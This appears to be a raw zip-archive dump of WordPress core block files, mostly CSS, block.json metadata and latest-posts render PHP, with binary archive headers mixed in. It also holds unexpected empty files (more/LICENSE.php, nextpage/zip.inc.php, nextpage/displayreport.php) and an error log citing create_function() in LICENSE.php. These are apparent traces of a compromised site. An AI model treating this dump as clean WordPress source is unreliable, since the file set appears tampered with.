    ', $image_classes, $featured_image ); } $title = get_the_title( $post ); if ( ! $title ) { $title = __( '(no title)' ); } $list_items_markup .= sprintf( '%2$s', $post_link, $title ); if ( isset( $attributes['displayAuthor'] ) && $attributes['displayAuthor'] ) { $author_display_name = get_the_author_meta( 'display_name', $post->post_author ); /* translators: byline. %s: current author. */ $byline = sprintf( __( 'by %s' ), $author_display_name ); if ( ! empty( $author_display_name ) ) { $list_items_markup .= sprintf( '', esc_html( $byline ) ); } } if ( isset( $attributes['displayPostDate'] ) && $attributes['displayPostDate'] ) { $list_items_markup .= sprintf( '', esc_attr( get_the_date( 'c', $post ) ), esc_html( get_the_date( '', $post ) ) ); } if ( isset( $attributes['displayPostContent'] ) && $attributes['displayPostContent'] && isset( $attributes['displayPostContentRadio'] ) && 'excerpt' === $attributes['displayPostContentRadio'] ) { $trimmed_excerpt = get_the_excerpt( $post ); if ( post_password_required( $post ) ) { $trimmed_excerpt = __( 'This content is password protected.' ); } $list_items_markup .= sprintf( '
    %1$s
    ', $trimmed_excerpt ); } if ( isset( $attributes['displayPostContent'] ) && $attributes['displayPostContent'] && isset( $attributes['displayPostContentRadio'] ) && 'full_post' === $attributes['displayPostContentRadio'] ) { $post_content = wp_kses_post( html_entity_decode( $post->post_content, ENT_QUOTES, get_option( 'blog_charset' ) ) ); if ( post_password_required( $post ) ) { $post_content = __( 'This content is password protected.' ); } $list_items_markup .= sprintf( '
    %1$s
    ', $post_content ); } $list_items_markup .= "
  • \n"; } remove_filter( 'excerpt_length', 'block_core_latest_posts_get_excerpt_length', 20 ); $class = 'wp-block-latest-posts__list'; if ( isset( $attributes['postLayout'] ) && 'grid' === $attributes['postLayout'] ) { $class .= ' is-grid'; } if ( isset( $attributes['columns'] ) && 'grid' === $attributes['postLayout'] ) { $class .= ' columns-' . $attributes['columns']; } if ( isset( $attributes['displayPostDate'] ) && $attributes['displayPostDate'] ) { $class .= ' has-dates'; } if ( isset( $attributes['displayAuthor'] ) && $attributes['displayAuthor'] ) { $class .= ' has-author'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class ) ); return sprintf( '', $wrapper_attributes, $list_items_markup ); } /** * Registers the `core/latest-posts` block on server. */ function register_block_core_latest_posts() { register_block_type_from_metadata( __DIR__ . '/latest-posts', array( 'render_callback' => 'render_block_core_latest_posts', ) ); } add_action( 'init', 'register_block_core_latest_posts' ); /** * Handles outdated versions of the `core/latest-posts` block by converting * attribute `categories` from a numeric string to an array with key `id`. * * This is done to accommodate the changes introduced in #20781 that sought to * add support for multiple categories to the block. However, given that this * block is dynamic, the usual provisions for block migration are insufficient, * as they only act when a block is loaded in the editor. * * TODO: Remove when and if the bottom client-side deprecation for this block * is removed. * * @param array $block A single parsed block object. * * @return array The migrated block object. */ function block_core_latest_posts_migrate_categories( $block ) { if ( 'core/latest-posts' === $block['blockName'] && ! empty( $block['attrs']['categories'] ) && is_string( $block['attrs']['categories'] ) ) { $block['attrs']['categories'] = array( array( 'id' => absint( $block['attrs']['categories'] ) ), ); } return $block; } add_filter( 'render_block_data', 'block_core_latest_posts_migrate_categories' ); PK6[)list/block.jsonnu[{ "apiVersion": 2, "name": "core/list", "category": "text", "attributes": { "ordered": { "type": "boolean", "default": false }, "values": { "type": "string", "source": "html", "selector": "ol,ul", "multiline": "li", "__unstableMultilineWrapperTags": [ "ol", "ul" ], "default": "" }, "type": { "type": "string" }, "start": { "type": "number" }, "reversed": { "type": "boolean" } }, "supports": { "anchor": true, "className": false, "fontSize": true, "color": { "gradients": true }, "__unstablePasteTextInline": true }, "editorStyle": "wp-block-list-editor", "style": "wp-block-list" } PK6[qYWWlist/style-rtl.min.cssnu[ol,ul{box-sizing:border-box}ol.has-background,ul.has-background{padding:1.25em 2.375em}PK6[qYWWlist/style.min.cssnu[ol,ul{box-sizing:border-box}ol.has-background,ul.has-background{padding:1.25em 2.375em}PK6[bblist/style-rtl.cssnu[ol,ul{ box-sizing:border-box; } ol.has-background,ul.has-background{ padding:1.25em 2.375em; }PK6[bblist/style.cssnu[ol,ul{ box-sizing:border-box; } ol.has-background,ul.has-background{ padding:1.25em 2.375em; }PK6[S5}}media-text/block.jsonnu[{ "apiVersion": 2, "name": "core/media-text", "category": "media", "attributes": { "align": { "type": "string", "default": "wide" }, "mediaAlt": { "type": "string", "source": "attribute", "selector": "figure img", "attribute": "alt", "default": "" }, "mediaPosition": { "type": "string", "default": "left" }, "mediaId": { "type": "number" }, "mediaUrl": { "type": "string", "source": "attribute", "selector": "figure video,figure img", "attribute": "src" }, "mediaLink": { "type": "string" }, "linkDestination": { "type": "string" }, "linkTarget": { "type": "string", "source": "attribute", "selector": "figure a", "attribute": "target" }, "href": { "type": "string", "source": "attribute", "selector": "figure a", "attribute": "href" }, "rel": { "type": "string", "source": "attribute", "selector": "figure a", "attribute": "rel" }, "linkClass": { "type": "string", "source": "attribute", "selector": "figure a", "attribute": "class" }, "mediaType": { "type": "string" }, "mediaWidth": { "type": "number", "default": 50 }, "mediaSizeSlug": { "type": "string" }, "isStackedOnMobile": { "type": "boolean", "default": true }, "verticalAlignment": { "type": "string" }, "imageFill": { "type": "boolean" }, "focalPoint": { "type": "object" } }, "supports": { "anchor": true, "align": [ "wide", "full" ], "html": false, "color": { "gradients": true, "link": true } }, "editorStyle": "wp-block-media-text-editor", "style": "wp-block-media-text" } PK6[,E c..media-text/editor.min.cssnu[.wp-block-media-text__media{position:relative}.wp-block-media-text__media.is-transient img{opacity:.3}.wp-block-media-text__media .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.wp-block-media-text .__resizable_base__{grid-column:1/span 2;grid-row:2}.wp-block-media-text .editor-media-container__resizer{width:100%!important}.wp-block-media-text.is-image-fill .editor-media-container__resizer{height:100%!important}.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{max-width:unset}PK6[Ismedia-text/style-rtl.min.cssnu[.wp-block-media-text{box-sizing:border-box;direction:ltr;display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__media{align-self:start}.wp-block-media-text .wp-block-media-text__content,.wp-block-media-text .wp-block-media-text__media,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{align-self:end}.wp-block-media-text .wp-block-media-text__media{grid-column:1;grid-row:1;margin:0}.wp-block-media-text .wp-block-media-text__content{direction:rtl;grid-column:2;grid-row:1;padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__media{grid-column:2;grid-row:1}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{grid-column:1;grid-row:1}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill .wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media img{clip:rect(0,0,0,0);border:0;height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{grid-column:1;grid-row:2}}PK6[ %nnmedia-text/editor.cssnu[.wp-block-media-text__media{ position:relative; } .wp-block-media-text__media.is-transient img{ opacity:.3; } .wp-block-media-text__media .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .wp-block-media-text .__resizable_base__{ grid-column:1 / span 2; grid-row:2; } .wp-block-media-text .editor-media-container__resizer{ width:100% !important; } .wp-block-media-text.is-image-fill .editor-media-container__resizer{ height:100% !important; } .wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{ max-width:unset; }PK6[Xmedia-text/style.min.cssnu[.wp-block-media-text{box-sizing:border-box; /*!rtl:begin:ignore*/direction:ltr; /*!rtl:end:ignore*/display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__media{align-self:start}.wp-block-media-text .wp-block-media-text__content,.wp-block-media-text .wp-block-media-text__media,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{align-self:end}.wp-block-media-text .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1; /*!rtl:end:ignore*/margin:0}.wp-block-media-text .wp-block-media-text__content{direction:ltr; /*!rtl:begin:ignore*/grid-column:2;grid-row:1; /*!rtl:end:ignore*/padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:2;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill .wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill .wp-block-media-text__media img{clip:rect(0,0,0,0);border:0;height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{grid-column:1;grid-row:2}}PK6[%ppmedia-text/editor-rtl.cssnu[.wp-block-media-text__media{ position:relative; } .wp-block-media-text__media.is-transient img{ opacity:.3; } .wp-block-media-text__media .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .wp-block-media-text .__resizable_base__{ grid-column:1 / span 2; grid-row:2; } .wp-block-media-text .editor-media-container__resizer{ width:100% !important; } .wp-block-media-text.is-image-fill .editor-media-container__resizer{ height:100% !important; } .wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{ max-width:unset; }PK6[\ 800media-text/editor-rtl.min.cssnu[.wp-block-media-text__media{position:relative}.wp-block-media-text__media.is-transient img{opacity:.3}.wp-block-media-text__media .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.wp-block-media-text .__resizable_base__{grid-column:1/span 2;grid-row:2}.wp-block-media-text .editor-media-container__resizer{width:100%!important}.wp-block-media-text.is-image-fill .editor-media-container__resizer{height:100%!important}.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{max-width:unset}PK6[qDmedia-text/style-rtl.cssnu[.wp-block-media-text{ box-sizing:border-box; direction:ltr; display:grid; grid-template-columns:50% 1fr; grid-template-rows:auto; } .wp-block-media-text.has-media-on-the-right{ grid-template-columns:1fr 50%; } .wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__media{ align-self:start; } .wp-block-media-text .wp-block-media-text__content,.wp-block-media-text .wp-block-media-text__media,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__media{ align-self:center; } .wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{ align-self:end; } .wp-block-media-text .wp-block-media-text__media{ grid-column:1; grid-row:1; margin:0; } .wp-block-media-text .wp-block-media-text__content{ direction:rtl; grid-column:2; grid-row:1; padding:0 8%; word-break:break-word; } .wp-block-media-text.has-media-on-the-right .wp-block-media-text__media{ grid-column:2; grid-row:1; } .wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{ grid-column:1; grid-row:1; } .wp-block-media-text__media img,.wp-block-media-text__media video{ height:auto; max-width:unset; vertical-align:middle; width:100%; } .wp-block-media-text.is-image-fill .wp-block-media-text__media{ background-size:cover; height:100%; min-height:250px; } .wp-block-media-text.is-image-fill .wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill .wp-block-media-text__media img{ clip:rect(0, 0, 0, 0); border:0; height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; } @media (max-width:600px){ .wp-block-media-text.is-stacked-on-mobile{ grid-template-columns:100% !important; } .wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{ grid-column:1; grid-row:1; } .wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{ grid-column:1; grid-row:2; } }PK6[media-text/style.cssnu[.wp-block-media-text{ box-sizing:border-box; direction:ltr; display:grid; grid-template-columns:50% 1fr; grid-template-rows:auto; } .wp-block-media-text.has-media-on-the-right{ grid-template-columns:1fr 50%; } .wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top .wp-block-media-text__media{ align-self:start; } .wp-block-media-text .wp-block-media-text__content,.wp-block-media-text .wp-block-media-text__media,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center .wp-block-media-text__media{ align-self:center; } .wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{ align-self:end; } .wp-block-media-text .wp-block-media-text__media{ grid-column:1; grid-row:1; margin:0; } .wp-block-media-text .wp-block-media-text__content{ direction:ltr; grid-column:2; grid-row:1; padding:0 8%; word-break:break-word; } .wp-block-media-text.has-media-on-the-right .wp-block-media-text__media{ grid-column:2; grid-row:1; } .wp-block-media-text.has-media-on-the-right .wp-block-media-text__content{ grid-column:1; grid-row:1; } .wp-block-media-text__media img,.wp-block-media-text__media video{ height:auto; max-width:unset; vertical-align:middle; width:100%; } .wp-block-media-text.is-image-fill .wp-block-media-text__media{ background-size:cover; height:100%; min-height:250px; } .wp-block-media-text.is-image-fill .wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill .wp-block-media-text__media img{ clip:rect(0, 0, 0, 0); border:0; height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; } @media (max-width:600px){ .wp-block-media-text.is-stacked-on-mobile{ grid-template-columns:100% !important; } .wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{ grid-column:1; grid-row:1; } .wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{ grid-column:1; grid-row:2; } }PK6[K=Cmissing/block.jsonnu[{ "apiVersion": 2, "name": "core/missing", "category": "text", "attributes": { "originalName": { "type": "string" }, "originalUndelimitedContent": { "type": "string" }, "originalContent": { "type": "string", "source": "html" } }, "supports": { "className": false, "customClassName": false, "inserter": false, "html": false, "reusable": false } } PK6[}RRmore/block.jsonnu[{ "apiVersion": 2, "name": "core/more", "category": "design", "attributes": { "customText": { "type": "string" }, "noTeaser": { "type": "boolean", "default": false } }, "supports": { "customClassName": false, "className": false, "html": false, "multiple": false }, "editorStyle": "wp-block-more-editor" } PK6[more/LICENSE.phpnu[PK6[more/error_lognu[[01-Feb-2025 01:05:36 UTC] PHP Deprecated: Function create_function() is deprecated in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/more/LICENSE.php on line 4 PK6[5Rmore/editor.min.cssnu[.block-editor-block-list__block[data-type="core/more"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-more{display:block;text-align:center;white-space:nowrap}.wp-block-more input[type=text]{background:#fff;border:none;border-radius:4px;box-shadow:none;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;margin:0;max-width:100%;padding:6px 8px;position:relative;text-align:center;text-transform:uppercase;white-space:nowrap}.wp-block-more input[type=text]:focus{box-shadow:none}.wp-block-more:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}PK6[ RDDmore/editor.cssnu[.block-editor-block-list__block[data-type="core/more"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-more{ display:block; text-align:center; white-space:nowrap; } .wp-block-more input[type=text]{ background:#fff; border:none; border-radius:4px; box-shadow:none; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; margin:0; max-width:100%; padding:6px 8px; position:relative; text-align:center; text-transform:uppercase; white-space:nowrap; } .wp-block-more input[type=text]:focus{ box-shadow:none; } .wp-block-more:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; }PK6[ RDDmore/editor-rtl.cssnu[.block-editor-block-list__block[data-type="core/more"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-more{ display:block; text-align:center; white-space:nowrap; } .wp-block-more input[type=text]{ background:#fff; border:none; border-radius:4px; box-shadow:none; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; margin:0; max-width:100%; padding:6px 8px; position:relative; text-align:center; text-transform:uppercase; white-space:nowrap; } .wp-block-more input[type=text]:focus{ box-shadow:none; } .wp-block-more:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; }PK6[5Rmore/editor-rtl.min.cssnu[.block-editor-block-list__block[data-type="core/more"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-more{display:block;text-align:center;white-space:nowrap}.wp-block-more input[type=text]{background:#fff;border:none;border-radius:4px;box-shadow:none;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;margin:0;max-width:100%;padding:6px 8px;position:relative;text-align:center;text-transform:uppercase;white-space:nowrap}.wp-block-more input[type=text]:focus{box-shadow:none}.wp-block-more:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}PK6[[{nextpage/block.jsonnu[{ "apiVersion": 2, "name": "core/nextpage", "category": "design", "parent": [ "core/post-content" ], "supports": { "customClassName": false, "className": false, "html": false }, "editorStyle": "wp-block-nextpage-editor" } PK6[nextpage/displayreport.phpnu[PK6[nextpage/zip.inc.phpnu[PK6[IPPnextpage/editor.min.cssnu[.block-editor-block-list__block[data-type="core/nextpage"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-nextpage{display:block;text-align:center;white-space:nowrap}.wp-block-nextpage>span{background:#fff;border-radius:4px;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;padding:6px 8px;position:relative;text-transform:uppercase}.wp-block-nextpage:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}PK6[Mynextpage/editor.cssnu[.block-editor-block-list__block[data-type="core/nextpage"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-nextpage{ display:block; text-align:center; white-space:nowrap; } .wp-block-nextpage>span{ background:#fff; border-radius:4px; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; padding:6px 8px; position:relative; text-transform:uppercase; } .wp-block-nextpage:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; }PK6[Mynextpage/editor-rtl.cssnu[.block-editor-block-list__block[data-type="core/nextpage"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-nextpage{ display:block; text-align:center; white-space:nowrap; } .wp-block-nextpage>span{ background:#fff; border-radius:4px; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; padding:6px 8px; position:relative; text-transform:uppercase; } .wp-block-nextpage:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; }PK6[IPPnextpage/editor-rtl.min.cssnu[.block-editor-block-list__block[data-type="core/nextpage"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-nextpage{display:block;text-align:center;white-space:nowrap}.wp-block-nextpage>span{background:#fff;border-radius:4px;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;padding:6px 8px;position:relative;text-transform:uppercase}.wp-block-nextpage:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}PK6[\=mparagraph/block.jsonnu[{ "apiVersion": 2, "name": "core/paragraph", "category": "text", "attributes": { "align": { "type": "string" }, "content": { "type": "string", "source": "html", "selector": "p", "default": "" }, "dropCap": { "type": "boolean", "default": false }, "placeholder": { "type": "string" }, "direction": { "type": "string", "enum": [ "ltr", "rtl" ] } }, "supports": { "anchor": true, "className": false, "color": { "link": true }, "fontSize": true, "lineHeight": true, "__experimentalSelector": "p", "__unstablePasteTextInline": true }, "editorStyle": "wp-block-paragraph-editor", "style": "wp-block-paragraph" } PK6[eeparagraph/editor.min.cssnu[.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{min-height:auto!important}.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{opacity:1}.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{opacity:0}.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}PK6[ paragraph/style-rtl.min.cssnu[.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:right;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em 0 0 .1em;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-right:.1em}p.has-drop-cap.has-background{overflow:hidden}p.has-background{padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}PK6[div{display:inline}.wp-block-rss__placeholder-form>*{margin-bottom:8px}@media (min-width:782px){.wp-block-rss__placeholder-form>*{margin-bottom:0}}.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{flex:1;min-width:80%}PK6[3Arss/style-rtl.min.cssnu[ul.wp-block-rss{list-style:none;padding:0}ul.wp-block-rss.wp-block-rss{box-sizing:border-box}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;list-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 0 1em 1em;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}PK6[- rss/editor.cssnu[.wp-block-rss li a>div{ display:inline; } .wp-block-rss__placeholder-form>*{ margin-bottom:8px; } @media (min-width:782px){ .wp-block-rss__placeholder-form>*{ margin-bottom:0; } } .wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{ flex:1; min-width:80%; }PK6[A?'rss/style.min.cssnu[ul.wp-block-rss{list-style:none;padding:0}ul.wp-block-rss.wp-block-rss{box-sizing:border-box}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;list-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}PK6[- rss/editor-rtl.cssnu[.wp-block-rss li a>div{ display:inline; } .wp-block-rss__placeholder-form>*{ margin-bottom:8px; } @media (min-width:782px){ .wp-block-rss__placeholder-form>*{ margin-bottom:0; } } .wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{ flex:1; min-width:80%; }PK6[prss/editor-rtl.min.cssnu[.wp-block-rss li a>div{display:inline}.wp-block-rss__placeholder-form>*{margin-bottom:8px}@media (min-width:782px){.wp-block-rss__placeholder-form>*{margin-bottom:0}}.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{flex:1;min-width:80%}PK6[}j55rss/style-rtl.cssnu[ul.wp-block-rss{ list-style:none; padding:0; } ul.wp-block-rss.wp-block-rss{ box-sizing:border-box; } ul.wp-block-rss.alignleft{ margin-right:2em; } ul.wp-block-rss.alignright{ margin-left:2em; } ul.wp-block-rss.is-grid{ display:flex; flex-wrap:wrap; list-style:none; padding:0; } ul.wp-block-rss.is-grid li{ margin:0 0 1em 1em; width:100%; } @media (min-width:600px){ ul.wp-block-rss.columns-2 li{ width:calc(50% - 1em); } ul.wp-block-rss.columns-3 li{ width:calc(33.33333% - 1em); } ul.wp-block-rss.columns-4 li{ width:calc(25% - 1em); } ul.wp-block-rss.columns-5 li{ width:calc(20% - 1em); } ul.wp-block-rss.columns-6 li{ width:calc(16.66667% - 1em); } } .wp-block-rss__item-author,.wp-block-rss__item-publish-date{ display:block; font-size:.8125em; }PK6[55 rss/style.cssnu[ul.wp-block-rss{ list-style:none; padding:0; } ul.wp-block-rss.wp-block-rss{ box-sizing:border-box; } ul.wp-block-rss.alignleft{ margin-right:2em; } ul.wp-block-rss.alignright{ margin-left:2em; } ul.wp-block-rss.is-grid{ display:flex; flex-wrap:wrap; list-style:none; padding:0; } ul.wp-block-rss.is-grid li{ margin:0 1em 1em 0; width:100%; } @media (min-width:600px){ ul.wp-block-rss.columns-2 li{ width:calc(50% - 1em); } ul.wp-block-rss.columns-3 li{ width:calc(33.33333% - 1em); } ul.wp-block-rss.columns-4 li{ width:calc(25% - 1em); } ul.wp-block-rss.columns-5 li{ width:calc(20% - 1em); } ul.wp-block-rss.columns-6 li{ width:calc(16.66667% - 1em); } } .wp-block-rss__item-author,.wp-block-rss__item-publish-date{ display:block; font-size:.8125em; }PK6[rss.phpnu[PK6[a search/block.jsonnu[{ "apiVersion": 2, "name": "core/search", "category": "widgets", "attributes": { "label": { "type": "string" }, "showLabel": { "type": "boolean", "default": true }, "placeholder": { "type": "string", "default": "" }, "width": { "type": "number" }, "widthUnit": { "type": "string" }, "buttonText": { "type": "string" }, "buttonPosition": { "type": "string", "default": "button-outside" }, "buttonUseIcon": { "type": "boolean", "default": false } }, "supports": { "align": [ "left", "center", "right" ], "html": false }, "editorStyle": "wp-block-search-editor", "style": "wp-block-search" } PK6[ܸ$search/editor.min.cssnu[.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{margin:auto}.wp-block-search .wp-block-search__button{align-items:center;border-radius:initial;display:flex;height:auto;justify-content:center}.wp-block-search__components-button-group{margin-top:10px}PK6[ U__search/style-rtl.min.cssnu[.wp-block-search__button{margin-right:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{fill:currentColor;min-height:24px;min-width:24px;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-right:0;max-width:calc(100% - 100px)}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) 